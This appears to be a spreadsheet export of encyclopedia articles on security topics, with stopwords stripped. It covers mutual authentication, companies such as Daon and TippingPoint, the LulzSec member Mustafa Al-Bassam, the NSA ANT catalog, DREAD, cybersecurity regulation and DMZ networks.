beginning implement smart card (two-factor) biometric-based (three-factor) authentication schemes. smart cards simpler implement easy authentication, still risks tampered with. biometrics grown popular password-based schemes difficult copy guess session keys using biometrics, difficult encrypt noisy data. security risks limitations, schemes still employ mutual authentication regardless many authentication factors added. certificate based schemes system applications mutual authentication often found schemes employed internet things (iot), physical objects incorporated internet communicate address. authentication schemes applied many types systems involve data transmission. internet's presence mechanical systems increases, writing effective security schemes large numbers users, objects, servers become challenging, especially needing schemes lightweight computational costs. instead password-based authentication, devices certificates verify other's identities. radio networks mutual authentication satisfied radio network schemes, data transmissions radio frequencies secure verifying sender receiver.radio frequency identification (rfid) tags commonly used object detection, many manufacturers implementing warehouse systems automation. this allows faster keep inventory track objects. however, keeping track items system rfid tags transmit data cloud server increases chances security risks, digital elements keep track three mutual authentication occur rfid tags, readers, cloud network stores data order keep rfid data secure unable manipulated.similarly, alternate rfid reader system assigns designated readers tags proposed extra security memory cost. instead considering readers entity, certain readers read specific tags. with method, reader breached, affect whole system. individual readers communicate specific tags mutual authentication, runs constant time readers private authentication process. many e-healthcare systems remotely monitor patient health data wireless body area networks (wban) transmit data radio frequencies. this beneficial patients disturbed monitored, reduced workload medical worker allow focus hands-on jobs. however, large concern healthcare providers patients using remote health data tracking sensitive patient data transmitted unsecured channels, authentication occurs medical body area network user (the patient), healthcare service provider (hsp) trusted third party. cloud based computing e-healthcare clouds another store patient data collected remotely. clouds useful storing large amounts data, medical information, accessed many devices whenever needed. telecare medical information systems (tmis), important medical patients receive healthcare remotely, ensure secured data mutual authentication verification schemes. blockchain proposed mutually authenticate user database, authenticating main medibchain node keeping patient anonymity.fog-cloud computing networking system handle large amounts data, still limitations regarding computational memory cost. mobile edge computing (mec) considered improved, lightweight fog-cloud computing networking system, used medical technology also revolves around location-based data. large physical range required locational tracking, networks send data edge cloud store data. application like smart watches track patient health data used call nearest hospital patient shows negative change vitals.fog node networks implemented automation, keeping data surrounding states secure. authenticating nodes vehicle, vehicular handoff becomes safe process car’s system safe hackers. machine machine verification many systems require human user part system also protocols mutually authenticate parties. unmanned aerial vehicle (uav) systems, platform authentication occurs rather user authentication. mutual authentication vehicle communication prevents vehicle's system breached, affect whole system negatively. example, system drones employed agriculture work cargo delivery, drone breached, whole system potential collapse. also authentication authentication protocol computer security logic digital signature secure channel zero trust security model external links types mutual authentication references</t>
  </si>
  <si>
    <t>Daon, Inc.</t>
  </si>
  <si>
    <t>daon (pronounced day-on) international biometrics identity assurance software company founded 1999 irish entrepreneur dermot desmond. name, daon, chosen stems celtic word human being, duine daonna. daon headquartered miles outside washington, fairfax, daon also major operations dublin, located international financial services center (ifsc). additional office canberra, australia. history 2006, daon american association airport executives (aaae) entered joint venture create security biometric clearing network (sbcn) provide services biometric identity management, including enrollment, background checking, secure biometric biographic information storage, card issuance.in august 2008 daon acquired software assets associated personnel physical security interconnectivity enterprise air, york-based provider solutions physical security market.in july 2019, daon announced launch identityx digital onboarding 2.0, sets industry standard all-digital customer onboarding. overview daon's products include identityx (their flagship biometric mobile authentication platform), daonengine, daonenroll, daonanalytics, credential connect. daon’s biometric products integrate preexisting platforms applications manage identity life-cycles. daon serves multiple markets including mobile authentication, border management, civil traveler employee credentialing, access control. their software used worldwide airports international borders supports u.s. registered traveler airports. identityx identityx platform allows users authenticate mobile device using biometrics instead password. identityx uses facial recognition, voice recognition, fingerprint, prove user claim 2015, identityx first products certified fido alliance, industry consortium paypal lenovo among founders. also 2015, daon’s identityx nacuso’s next idea competition well best show award cuna technology council. also dermot desmond references external links company website</t>
  </si>
  <si>
    <t>Mustafa Al-Bassam</t>
  </si>
  <si>
    <t>mustafa al-bassam (born january 1995) british computer security researcher hacker. co-founded hacker group lulzsec 2011, responsible several high profile breaches. later went co-found chainspace, company implementing smart contract platform, acquired facebook 2019. currently student information security research group university college london working peer-to-peer systems. forbes listed al-bassam under entrepreneurs technology 2016. early life education al-bassam born baghdad, iraq january 1995, migrated london, united kingdom five years old. received computer science king's college london, currently student university college london. career research distributed ledgers al-bassam published research scaling blockchains cryptocurrencies. contributed design implementation chainspace, blockchain protocol makes sharding increase transaction throughput. chainspace later spun-out commercial company co-founded, acquired facebook 2019 become part libra project. al-bassam since critical libra, stating "the road dystopia paved good intentions, concerned libra's model decentralization". privacy surveillance 2014 al-bassam volunteered privacy international, released research computer destruction techniques gchq used forcing journalists guardian's london headquarters destroy computers stored copies classified documents provided whistleblower edward snowden.in article motherboard, revealed gchq's joint threat research intelligence group (jtrig), involved online sockpuppetry creating series fake twitter accounts shortener used honeypot dissidents arab spring, targeted jtrig himself. hacktivism 2011 year teenager, al-bassam core members lulzsec 50-day hacking spree, going alias "tflow". group attacked compromised number high profile organizations corporations, including sony, fox, news international, nintendo cia.he also affiliated online association hacktivists known anonymous, involved hacking emails hbgary federal, intelligence contractor u.s. government. emails revealed hbgary federal working develop astroturfing software create "army" fake social media profiles, hired u.s. chamber commerce smear political opponents fake documents communications. result, members u.s. congress called investigation hbgary federal. arrest legal proceedings july 2011, announced news press outlets london's metropolitan police arrested 16-year-old student london alleged used nickname "tflow" series high-profile attacks fox.com, affiliate "infragard", sony. legal reasons, name could disclosed nearly years. april 2013, tflow's full name revealed along picture multiple news outlets throughout internet. pleaded guilty computer misuse received 20-month suspended sentence hours unpaid community service work. nearly two-year internet imposed police since expired. awards honours 2016, al-bassam listed forbes under technology section work uncovering government surveillance. references</t>
  </si>
  <si>
    <t>Sensorvault</t>
  </si>
  <si>
    <t>sensorvault internal google database contains records users' historical geo-location data.: used enforcement obtain geo-fence warrant search devices within vicinity crime, (within geo-fenced area): looking devices' movements narrowing devices potential suspects witnesses, asking google information owners devices.: references</t>
  </si>
  <si>
    <t>Mushroom Networks</t>
  </si>
  <si>
    <t>mushroom networks, inc. privately held company diego, california. mushroom networks founded 2004, electrical computer engineer rene cruz, cahit akin rajesh mishra spin-off university california, diego (ucsd) support liebig center. mushroom networks also received initial funding support ventures, angeles investment firm.the company solely focuses networking products utilizing "broadband bonding" technology. various configurations, products provide end-user appearance larger bandwidth aggregating multiple network services load balancing, and/or channel bonding. mushroom networks developed broadband bonding extensive research development. networking products february, 2008, mushroom networks announced truffle (bbna6401) broadband bonding network appliance. truffle (bbna6401) bond high speed internet connections improve network speed. july, 2008, company introduced another product porcini (bbna4422) smaller broadband bonding product. this product bond four high speed internet connections wireless port card improve internet speeds. september, 2008 company introduced portabella (bbna2242) combining multiple cellular data cards single internet protocol connection. this product allows bandwidth wired connectivity option. june, 2009, mushroom networks announced second generation portabella (bbna141) fastest wireless cellular internet connection. this small portable product room four wireless modems front side, ethernet port back. july, 2009, company announced second generation truffle (bbna6401), calling truffle(bbna5201g). second generation higher throughput, enhanced quality service (qos), automatic failover well enterprise level features. april, 2010, mushroom networks announces teleporter, industry's first broadcast quality live video streaming system utilizing bonded cellular link devices. teleporter enables single broadcast journalist send high quality digital video wireless local cellular networks instead requiring large broadcast crew expensive equipment. july 2017, mushroom networks launched autopilot' sd-wan service partners. august 2019, mushroom networks awarded 2019 communications solutions product year award cognitive sd-wan product line. references</t>
  </si>
  <si>
    <t>Reza Derakhshani</t>
  </si>
  <si>
    <t>reza derakhshani inventor professor computer science electrical engineering university missouri kansas city. known inventing developing biometric security system uses patterns blood vessels eyes. research encompassed biometrics, biometric spoofing, biomedical signal image processing, computational intelligence. after earning b.s. iran university science technology tehran, derakhshani continued studies west virginia university morganstown, earned ph.d. later taught georgetown university, washington, d.c., umkc. courses include advanced biomedical signal analysis, neural adaptive systems courses overseeing senior robotics design projects. along biometrics, also researches biomedical signal image processing computational intelligence. much research funded national science foundation's center identification technology research. also serves chief science officer eyeverify, missouri-based startup company develops markets biometric security software based derakhshani's research. vein verification derakhshani identified potential usefulness patterns blood vessels sclera white part eyes unique person. pattern imaged turned digital template, encoded mathematical statistical algorithms. these allow confirmation identity proper user rejection anyone else.derakhshani holds several patents technology, including 2008 patent concept using blood vessels seen whites unique identifier. honors awards 2014 umkc n.t. veatch award distinguished research creative activity. 2013 silicon prairie technologist year finalist. privacy design ambassador (august 2013 present). 2008 umkc trustees’ faculty scholar fellowship award distinguished research creativity january 2002 january 2004. lane fellowship highest academic achievement field study, lane department computer science electrical engineering, west virginia university. references external links personal website umkc</t>
  </si>
  <si>
    <t>TippingPoint</t>
  </si>
  <si>
    <t>tippingpoint, part trend micro security, american software company founded 1999 focus network security products, particularly intrusion prevention systems networks. history company founded january 1999 name shbang! texas. co-founders john mchale, kent savage (first chief executive), kenneth kalinoski. business develop sell internet appliances. 1999, company changed name netpliance november released i-opener, low-cost computer intended browsing world wide web. hardware sold loss, costs recouped subscription service plan. when device found easily modded avoid service plan, netpliance changed terms sale charge termination fee. 2001, federal trade commission fined company $100,000 sales billing practices.in 2002, company discontinued operations internet appliance business renamed tippingpoint. savage replaced chairman board mchale. mchale stepped 2004, remained chairman board. position filled mcclanahan, former broadjump. january 2005, tippingpoint acquired network equipment company 3com $442 million, operating division 3com james hamilton (tippingpoint president), later replaced alan kessler. 3com subsequently acquired computer manufacturer hewlett-packard april 2010 approximately $2.7 billion.on 2015, tippingpoint acquired trend micro approximately $300 million. technology tippingpoint ngips network intrusion prevention system (ips) deals threat protection. combines application-level security user awareness inbound/outbound messaging inspection capabilities, protect user's applications, network, data threats. september 2013, announced entered next-generation firewall market line tippingpoint firewalls. line extends tippingpoint's existing appliances traditional stateful packet filtering application control. references notes external links tippingpoint website search netpliance</t>
  </si>
  <si>
    <t>DShield</t>
  </si>
  <si>
    <t>dshield community-based collaborative firewall correlation system. receives logs volunteers worldwide uses analyze attack trends. used data collection engine behind sans internet storm center (isc). dshield officially launched november 2000 johannes ullrich. since then, grown dominating attack correlation engine worldwide coverage. dshield regularly used media cover current events. analysis provided dshield used early detection several worms, like "ramen", code red, "leaves", "sql snake" more. dshield data regularly used researchers analyze attack patterns. goal dshield project allow access correlated information public charge raise awareness provide accurate current snapshots internet attacks. several data feeds provided users either include sites aide analyze events. also sans institute (sysadmin, audit, network security sans) comparison network monitoring systems shieldsup spews references further reading holden, greg (2007). "part chapter optimizing shopping experience". starting online business dummies (fifth ed.). hoboken, usa: wiley publishing, inc. 163. isbn 9780470107393. rash, michael (2007). samuell, christina (ed.). linux firewalls: attack detection response iptables, psad, fwsnort. francisco, usa: starch press, inc. william pollack. 123-130. isbn 978-1593271411. fung, carol; boutaba, raouf (2017). "3.4 selected intrusion detection networks". intrusion detection networks: collaborative security. press. isbn 9781138198890. oclc 1065286709. external links official website</t>
  </si>
  <si>
    <t>DROPOUTJEEP</t>
  </si>
  <si>
    <t>catalog catalog) classified product catalog united states national security agency version written 2008–2009 published german news magazine spiegel december 2013. forty-nine catalog pages pictures, diagrams descriptions espionage devices spying software published. items available tailored access operations unit mostly targeted products companies apple, cisco dell. source believed someone different edward snowden, largely responsible global surveillance disclosures since 2013. companies whose products could compromised denied collaboration developing capabilities. 2014, project started implement capabilities catalog open-source hardware software. background tailored access operations unit existed since late 90s. mission collect intelligence foreign targets united states hacking computers telecommunication networks.in 2012, edward snowden organized cryptoparty together runa sandvik, former colleague jacob appelbaum project. june 2013, snowden took internal documents shared glenn greenwald laura poitras, resulting global surveillance disclosures. speculated years capabilities like catalog existed. publication jacob appelbaum co-authored english publication spiegel christian stöcker judith horchert, publicized december 2013. related english publication spiegel also authored people, including laura poitras, marcel rosenbach, jörg schindler holger stark. december appelbaum gave lecture "the militarization internet" 30th chaos communication congress hamburg, germany. talk, encouraged employees leak documents.apple denied allegations collaborated development dropoutjeep statement journalist arik hesseldahl things digital (part wall street journal's digital network). verge questioned program developed later years, since document composed early period iphone smartphones general. dell denied collaborating government general, including government. john stewart, senior vice president chief security officer cisco stated "deeply concerned continue pursue avenues determine need address issues." juniper stated working actively address possible exploit paths. huawei stated would take appropriate audits determine compromise taken place would communicate taken place. declined comment publication spiegel. sources author james bamford, specialized united states intelligence agencies, noted commentary article published reuters appelbaum identified source leaked catalog him, people mistakenly assume edward snowden. bamford unrestricted access documents cache edward snowden could find references catalog using automated search tools, thereby concluding documents leaked him. security expert bruce schneier stated blog also believes catalog come snowden, second leaker. officials believe crawler used snowden touched catalog started looking people could leaked catalog. content published catalog pages written 2008 2009. price items ranged free $250,000. follow-up developments security expert matt suiche noted software exploits leaked shadow brokers could seen genuine matched names catalog. john bumgarner stated ieee spectrum government suspicion huawei based ability backdoors shown catalog. playset playset open-source project inspired catalog create accessible easy tools security researchers. most surveillance tools recreated off-the-shelf open-source hardware software. thus far, playset consists fourteen items, code instructions found online project's homepage. after initial leak, michael ossman, founder great scott gadgets, gave shout security researchers start working tools mentioned catalog recreate them. name playset came originally dean pierce, also contributor (twilightvegetable(gsm)) playset. anyone invited join contribute device. requisites addition playset similar already existing project, ease silly name (based original tool's name possible). silly name requisite rule michael ossman came example given project's website: "for example, project similar foxacid, maybe could call coyotemeth." ease part stems also playset's motto: year can't count!" also cyberwarfare united states equation group minipanzer megapanzer stuxnet warrior pride explanatory notes references further reading koop, peter. "leaked documents attributed snowden". electrospaces.net. archived original 2022-02-24. retrieved 2022-04-12. external links playset wiki playset year toys tools black 2015 playset toorcamp 2014</t>
  </si>
  <si>
    <t>DREAD (risk assessment model)</t>
  </si>
  <si>
    <t>dread part system risk-assessing computer security threats formerly used microsoft. provides mnemonic risk rating security threats using five categories. categories are: damage would attack reproducibility easy reproduce attack? exploitability much work launch attack? affected users many people impacted? discoverability easy discover threat?the dread name comes initials five categories listed. initially proposed threat modeling abandoned discovered ratings consistent subject debate. discontinued microsoft 2008.when given threat assessed using dread, category given rating ratings given issue used prioritize among different issues. discoverability debate some security experts feel including "discoverability" element last rewards security obscurity, organizations either moved dread-d "dread minus scale (which omits discoverability) always assume discoverability maximum rating. also cyber security countermeasure stride another mnemonic security threats references external links improving application security: threats countermeasures dreadful, msdn blog post experiences threat modeling microsoft, adam shostack</t>
  </si>
  <si>
    <t>Tor Links</t>
  </si>
  <si>
    <t>Tor Browser Bundle</t>
  </si>
  <si>
    <t>Tor (network)</t>
  </si>
  <si>
    <t>Tor (anonymity network)</t>
  </si>
  <si>
    <t>NIS Directive</t>
  </si>
  <si>
    <t>cybersecurity regulation comprises directives safeguard information technology computer systems purpose forcing companies organizations protect systems information cyberattacks like viruses, worms, trojan horses, phishing, denial service (dos) attacks, unauthorized access (stealing intellectual property confidential information) control system attacks.[1] there numerous measures available prevent cyberattacks. cybersecurity measures include firewalls, anti-virus software, intrusion detection prevention systems, encryption, login passwords.[2] there attempts improve cybersecurity regulation collaborative efforts government private sector encourage voluntary improvements cybersecurity. industry regulators, including banking regulators, taken notice risk cybersecurity either begun planned begin include cybersecurity aspect regulatory examinations. background 2011 released guidance called department defense strategy operating cyberspace articulated five goals: treat cyberspace operational domain, employ defensive concepts protect networks systems, partner agencies private sector pursuit "whole-of-government cybersecurity strategy", work international allies support collective cybersecurity support development cyber workforce capable rapid technological innovation. march 2011 report "identified protecting federal government's information systems nation's cyber critical infrastructure governmentwide high-risk area" noting federal information security designated high-risk area since 1997. 2003 systems protecting critical infrastructure, called cyber critical infrastructure protection cyber also included.in november 2013, forward cybersecurity rule fed. reg. 69373), imposed certain requirements contractors: compliance certain nist standards, mandatory reporting cybersecurity incidents dod, "flow-down" clause applies requirements subcontractors.a june 2013 congressional report found statutes relevant cybersecurity compliance. federal information security management 2002 (fisma) statutes governing federal cybersecurity regulations. united states federal government there federal cybersecurity regulations ones exist focus specific industries. three main cybersecurity regulations 1996 health insurance portability accountability (hipaa), 1999 gramm-leach-bliley act, 2002 homeland security act, included federal information security management (fisma). three regulations mandate healthcare organizations, financial institutions, federal agencies protect systems information.[3] example, fisma, applies every government agency, "requires development implementation mandatory policies, principles, standards, guidelines information security." however, regulations address numerous computer-related industries, internet service providers (isps) software companies.[4] furthermore, regulations specify cybersecurity measures must implemented require "reasonable" level security. vague language regulations leaves much room interpretation. bruce schneier, founder cupertino's counterpane internet security, argues companies make sufficient investments cybersecurity unless government forces so.[5] also states successful cyberattacks government systems still occur despite government efforts.[6]it suggested data quality already provides office management budget statutory authority implement critical infrastructure protection regulations administrative procedure rulemaking process. idea fully vetted would require additional legal analysis rulemaking could begin. state governments state governments attempted improve cybersecurity increasing public visibility firms weak security. 2003, california passed notice security breach act, requires company maintains personal information california citizens security breach must disclose details event. personal information includes name, social security number, driver's license number, credit card number financial information.[7] several states followed california's example passed similar security breach notification regulations.[8] such security breach notification regulations punish firms cybersecurity failures giving freedom choose secure systems. also, regulation creates incentive companies voluntarily invest cybersecurity avoid potential loss reputation resulting economic loss come successful cyber attack.in 2004, california state legislature passed california assembly bill 1950, also applies businesses maintain personal information california residents. regulation dictates businesses maintain reasonable level security required security practices also extend business partners.[9] regulation improvement federal standard expands number firms required maintain acceptable standard cybersecurity. however, like federal legislation, requires "reasonable" level cybersecurity, leaves much room interpretation case established.[10] proposed regulation congress proposed numerous bills expand upon cybersecurity regulation. consumer data security notification amends gramm-leach-bliley require disclosure security breaches financial institutions. congressmen also proposed "expanding gramm-leach-bliley industries touch consumer financial information, including firm accepts payment credit card."[11] congress proposed cybersecurity regulations similar california's notice security breach companies maintain personal information. information protection security requires data brokers "ensure data accuracy confidentiality, authenticate track users, detect prevent unauthorized activity, mitigate potential harm individuals."[12]in addition requiring companies improve cybersecurity, congress also considering bills criminalize cyberattacks. securely protect yourself against cyber trespass (spy act) bill type. focused phishing spyware bill passed 2005, house representatives died senate. bill "makes unlawful unauthorized usage computer take control modify setting, collect induce owner disclose personally identifiable information, install unsolicited software, tamper security, anti-spyware, anti-virus software."[13]on 2011, president barack obama proposed package cybersecurity legislative reforms improve security persons, federal government, critical infrastructure. year public debate congress hearings followed, resulting house representative passing information sharing bill senate developing compromise bill seeking balance national security, privacy, business interests. july 2012, cybersecurity 2012 proposed senators joseph lieberman susan collins.[14] bill would required creating voluntary "best practice standards" protection infrastructure cyber attacks, businesses would encouraged adopt incentives liability protection.[15] bill vote senate failed pass.[16] obama voiced support wall street journal op-ed[17], also received support officials military national security including john brennan, chief counterterrorism adviser white house.[18][19] according washington post, experts said failure pass leave united states "vulnerable widespread hacking serious cyberattack." [20] opposed republican senators like john mccain concerned would introduce regulations would effective could "burden" businesses.[21] after senate vote, republican senator bailey hutchison stated opposition bill partisan issue take right approach cybersecurity.[22]the senate vote strictly along partisan lines, democrats voted five republicans voted it.[23] critics bill included chamber commerce,[24] advocacy groups like american civil liberties union electronic frontier foundation,[25] cybersecurity expert jody westby, heritage foundation, argued although government must cybersecurity, bill flawed approach represented "too intrusive federal role."[26]in february 2013, obama proposed executive order improving critical infrastructure cybersecurity. represents latest iteration policy considered addressed congress yet. seeks improve existing public-private partnerships enhancing timeliness information flow critical infrastructure companies. directs federal agencies share cyber threat intelligence warnings private sector entity identified target. also tasks improving process expedite security clearance processes applicable public private sector entities enable federal government share information appropriate sensitive classified levels. directs development framework reduce cyber risks, incorporating current industry best practices voluntary standards. lastly, tasks federal agencies involved incorporating privacy civil liberties protections line fair information practice principles.in january 2015, obama announced cybersecurity legislative proposal. proposal made effort prepare expanding number cyber crimes. proposal, obama outlined three main efforts work towards secure cyberspace first main effort emphasized importance enabling cybersecurity information sharing. enabling that, proposal encouraged information sharing government private sector. that would allow government know main cyber threats private firms facing would allow government provide liability protection firms shared information. furthermore, would give government better idea needs protected against. another main effort emphasized proposal modernize enforcement authorities make equipped properly deal cyber crimes giving tools need order would also update classifications cyber crimes consequences. would done would making crime overseas selling financial information. another goal effort place cyber crimes prosecutable. last major effort legislative proposal require businesses report data breaching consumers personal information sacrificed. requiring companies consumers aware danger identity theft.in february 2016, obama developed cybersecurity national security action plan (cnap). plan made create long-term actions strategies effort protect cyber threats. focus plan inform public growing threat cyber crimes, improve cybersecurity protections, protects personal information americans, inform americans control digital security. highlights plan include creating "commission enhancing national cybersecurity." goal create commission consists diverse group thinkers perspectives contribute make recommendations create stronger cybersecurity public private sector. second highlight plan change government government make secure place. third highlight plan give americans knowledge secure online accounts avoid theft personal information multi-factor authentication. fourth highlight plan invest money invested 2016 cybersecurity. other government efforts addition regulation, federal government tried improve cybersecurity allocating resources research collaborating private sector write standards. 2003, president's national strategy secure cyberspace made department homeland security (dhs) responsible security recommendations researching national solutions. plan calls cooperative efforts government industry create emergency response system cyber-attacks reduce nation's vulnerability threats "[27] 2004, congress allocated $4.7 billion toward cybersecurity achieving many goals stated president's national strategy secure cyberspace.[28] some industry security experts state president's national strategy secure cyberspace good first step insufficient.[29] bruce schneier stated, "the national strategy secure cyberspace secured anything yet." [30] however, president's national strategy clearly states purpose provide framework owners computer systems improve security rather government taking solving problem.[31] however, companies participate collaborative efforts outlined strategy required adopt discovered security solutions. united states, congress trying make information transparent cyber security 2012, would created voluntary standards protecting vital infrastructure, failed pass senate. february 2013, white house issued executive order, titled "improving critical infrastructure cybersecurity," allows executive branch share information threats companies individuals. april 2013, house representatives passed cyber intelligence sharing protection (cispa), calls protecting lawsuits aimed companies disclose breach information. obama administration said might veto bill. india light hacking website indian space agency's commercial 2015, antrix corporation government's digital india programme, cyberlaw expert advocate supreme court india, pavan duggal, stated dedicated cyber security legislation requirement india. sufficient merely cyber security part act. cyber security sectoral perspective, also national perspective." european union cybersecurity standards great prominence today's technology driven businesses. maximize profits, corporations leverage technology running operations internet. since large number risks entail internetwork operations, operations must protected comprehensive extensive regulations. existing cybersecurity regulations cover different aspects business operations often vary region country business operates. because differences country's society, infrastructure, values, overarching cyber security standard optimal decreasing risks. while standards provide basis operations, european union created tailored regulation businesses operating specifically within also, light brexit, important consider chosen adhere security regulations. three major regulations within include enisa, directive gdpr. they part digital single market strategy. enisa european union agency cybersecurity (enisa) governing agency originally regulation (ec) 460/2004 european parliament council march 2004 purpose raising network information security (nis) internetwork operations enisa currently runs regulation (eu) 526/2013, replaced original regulation 2013. enisa works actively member states provide range services. focus operations three factors: recommendations member states course action security breaches policy making implementation support members states direct support enisa taking hands-on approach working operational teams euenisa made management board relies support executive director permanent stakeholders group. most operations, however, heads various departments.enisa released various publications cover major issues cybersecurity. enisa's past current initiatives include cloud strategy, open standards information communications technology, cyber security strategy cyber security coordination group. enisa also works collaboration existing international standard organizations like itu. directive july 2016, european parliament policy directive security network information systems (the directive).the directive went effect august 2016, member states european union given months incorporate directive's regulations national laws. directive create overall higher level cybersecurity directive significantly affects digital service providers (dsps) operators essential services (oess). operators essential services include organizations whose operations would greatly affected case security breach engage critical societal economic activities. both dsps held accountable reporting major security incidents computer security incident response teams (csirt). while dsps held stringent regulations operators essential services, dsps still operate still face regulations. even dsps outsource maintenance information systems third parties, directive still holds accountable security incidents.the member states required create directive strategy, includes csirts, addition national competent authorities (ncas) single points contact (spocs). such resources given responsibility handling cybersecurity breaches minimizes impact. addition, member states encouraged share cyber security information.security requirements include technical measures manage risks cybersecurity breaches preventative manner. both must provide information allows depth assessment information systems security policies. significant incidents must notified csirts. significant cybersecurity incidents determined number users affected security breach well longevity incident geographical reach incident. making. cybersecurity cybersecurity establishes eu-wide cybersecurity certification framework digital products, services processes. complements directive. enisa role setting maintaining european cybersecurity certification framework. gdpr general data protection regulation (gdpr) place april 2016, current date enforcement 2018. gdpr aims bring single standard data protection among member states changes include redefining geographical borders. applies entities operate deal data resident regardless data processed, citizen's data processed, entity subject gdpr.fines also much stringent gdpr total million entity's annual turnover, whichever higher. addition, like previous regulations, data breaches effect rights freedoms individuals residing must disclosed within hours. overarching board, data protection board, edp, charge oversight gdpr. consent plays major role gdpr. companies hold data regards citizens must also offer right back sharing data easily consented sharing data.in addition, citizens also restrict processing data stored choose allow companies store data process creates clear differentiation. unlike previous regulations, gdpr also restricts transfer citizen's data outside third party without citizen's prior consent.the proposed eprivacy regulation also planned applicable 2018. reactions while experts agree cybersecurity improvements necessary, disagreement whether solution government regulation private-sector innovation. support many government officials cybersecurity experts believe private sector failed solve cybersecurity problem regulation needed. richard clarke states "industry responds threaten regulation. industry respond threat], follow through."[32] believes software companies must forced produce secure programs.[33] bruce schneier also supports regulation encourages software companies write secure code economic incentives.[34] representative rick boucher (d–va) proposes improving cybersecurity making software companies liable security flaws code.[35] addition, improving software security, clarke believes certain industries, utilities isps, require regulation.[36] opposition hand, many private-sector executives lobbyists believe regulation restrict ability improve cybersecurity. harris miller, lobbyist president information technology association america, believes regulation inhibits innovation.[37] rick white, former corporate attorney president lobby group technet, also opposes regulation. states "the private-sector must continue able innovate adapt response attack methods cyber space, toward end, commend president bush congress exercising regulatory restraint."[38]another reason many private-sector executives oppose regulation costly involves government oversight private enterprise. firms concerned regulation reducing profits regulation limiting flexibility solve cybersecurity problem efficiently. also cert coordination center cyber security standards cybersecurity information sharing default password list data breaches medical device hijack national cyber security division national strategy secure cyberspace presidential directive proactive cyber defence united states computer emergency readiness team united states department homeland security notes chronology data breaches reported since choicepoint incident." (2005). retrieved october 2005. "electronic privacy information center bill track: tracking privacy, speech civil liberties 109th congress." (2005). retrieved october 2005. "how computer viruses work." (2005). retrieved october 2005. "the national strategy secure cyberspace." (2003). retrieved december 2005. "notice security breach civil code sections 1798.29 1798.82 1798.84." 2003). retrieved october 2005. "richard clarke interview." (2003). retrieved december 2005. gordon, loeb, lucyshyn, richardson, (2005). "2005 csi/fbi computer crime security survey." retrieved october 2005. heiman, (2003). cybersecurity regulation here. security conference, washington, d.c. retrieved october 2005. kirby, (2003, december 2003). "forum focuses cybersecurity". francisco chronicle. lemos, (2003). "bush unveils final cybersecurity plan." retrieved december 2005. menn, (2002, january 2002). "security flaws pitfall microsoft". angeles times, rasmussen, brown, (2004). "california establishes duty care information security." retrieved october 2005. schmitt, charron, anderson, joseph, (2004). "what proposed data laws will mean marketers." retrieved october 2005. jennifer rizzo. (august 2012) "cybersecurity bill fails senate." accessed august 2012. paul rosenzweig. (july 2012) "cybersecurity 2012: revised cyber bill still problems." heritage foundation. accessed august 2012. o'keefe ellen nakashima. (august 2012 "cybersecurity bill fails senate." washington post. accessed august 2012. alex fitzpatrick. (july 2012) "obama gives thumbs-up cybersecurity bill." mashable. accessed august 2012. brendan sasso. (august 2012) "after defeat senate cybersecurity bill, obama weighs executive-order option". hill. accessed august 2012. jaikumar vijayan. (august 2012) partisan fight cybersecurity bill, senator says". computerworld. accessed august 2012. carl franzen. (august 2012) cybersecurity bill fails senate, privacy advocates rejoice". tpm. august 2012. alex fitzpatrick. (august 2012) "cybersecurity bill stalls senate". mashable. accessed august 2012. jody westby (august 2012) "congress needs back school cyber legislation". forbes. accessed august 2012. references</t>
  </si>
  <si>
    <t>Topsy Labs</t>
  </si>
  <si>
    <t>topsy labs social search analytics company based francisco, california. company certified twitter partner maintained comprehensive index tweets, numbering hundreds billions, dating back twitter's inception 2006.topsy made products search, analyze draw insights conversations trends public social websites including twitter google+.the company acquired apple inc. december 2013, shut december 2015. history topsy founded 2007 vipul prakash, rishab aiyer ghosh, gary iwatani justin foutts. company raised million venture capital bluerun ventures, ignition partners, founders fund, scott banister investors. company employees offices francisco washington operating data centers.in december 2013, topsy acquired apple inc. reported value around $225 million. december 2015, topsy service shut down, website redirected apple support page discussing search functionality products topsy.com topsy.com real-time search engine social posts socially shared content, primarily twitter google plus. service ranked results using proprietary social influence algorithm measured social media authors much others supported saying. service also provided access metrics term mentioned twitter free analytic service analytics.topsy.com, users could compare three terms content past hour, day, week month. announced september 2013 topsy would include every public tweet ever published twitter search analysis. topsy analytics topsy analytics commercial dashboard application allowed users conduct interactive analysis keywords authors activity, influence, exposure, sentiment, language geography. users could discover relevant tweets, links, photos videos term topsy’s index hundreds billions tweets. users able group terms saved topics setup customized alerts daily activity digests. topsy analytics public sector topsy analytics version topsy analytics product government agencies. intended purpose product facilitate disaster response, quantify political issues, detect disease outbreak monitor global anomalies. services topsy provided rest apis programmatically access twitter data metrics. users could also access data ad-hoc report requests. social indices twitter political index this index co-developed twitter topsy. debuted august 2012 originally compared social sentiment primary american presidential candidates. twitter oscars index this index also co-developed twitter topsy. debuted january 2013 originally compared social sentiment films nominated academy awards categories: best picture, best actor. best actress, best supporting actor, best supporting actress best director. topsy sentiment analysis used index correctly predicted five award recipients. sxsw trendspotter march 2013, mashable topsy co-produced mashable sxsw trendspotter, mobile-enabled website visitors could trending sxsw event, based real-time analysis twitter conversations. sxsw trendspotter provided analysis trending topics which start-ups, brands, bands films generating popular social conversations which sxsw sessions events popular details tweets, news, photos videos around topic references</t>
  </si>
  <si>
    <t>DMZ (computing)</t>
  </si>
  <si>
    <t>computer security, demilitarized zone (sometimes referred perimeter network screened subnet) physical logical subnetwork contains exposes organization's external-facing services untrusted, usually larger, network internet. purpose additional layer security organization's local area network (lan): external network node access exposed dmz, rest organization's network firewalled. functions small, isolated network positioned internet private network.this confused host, feature present home routers frequently differs greatly ordinary dmz. name term demilitarized zone, area states military operations permitted. rationale seen belonging either network bordering this metaphor applies computing acts gateway public internet. neither secure internal network, insecure public internet. case, hosts vulnerable attack provide services users outside local area network, e-mail, domain name system (dns) servers. because increased potential hosts suffering attack, placed specific subnetwork order protect rest network case become compromised. hosts permitted limited connectivity specific hosts internal network, content secure internal network. similarly, communication hosts external network also restricted make secure internet suitable housing special purpose services. this allows hosts communicate internal external network, intervening firewall controls traffic servers internal network clients, another firewall would perform level control protect external network. configuration provides additional security external attacks, typically bearing internal attacks sniffing communication packet analyzer spoofing e-mail spoofing. also sometimes good practice configure separate classified militarized zone (cmz), highly monitored militarized zone comprising mostly servers (and similar servers interface external world i.e. internet) contain sensitive information accessing servers within (like database servers). architecture, usually application firewall hosts servers. (the database servers could cmz, lan, separate vlan altogether.) service provided users external network placed dmz. common services are: servers mail servers servers voip serversweb servers communicate internal database require access database server, publicly accessible contain sensitive information. servers communicate database servers either directly application firewall security reasons. e-mail messages particularly user database confidential, typically stored servers cannot accessed internet least insecure manner), accessed email servers exposed 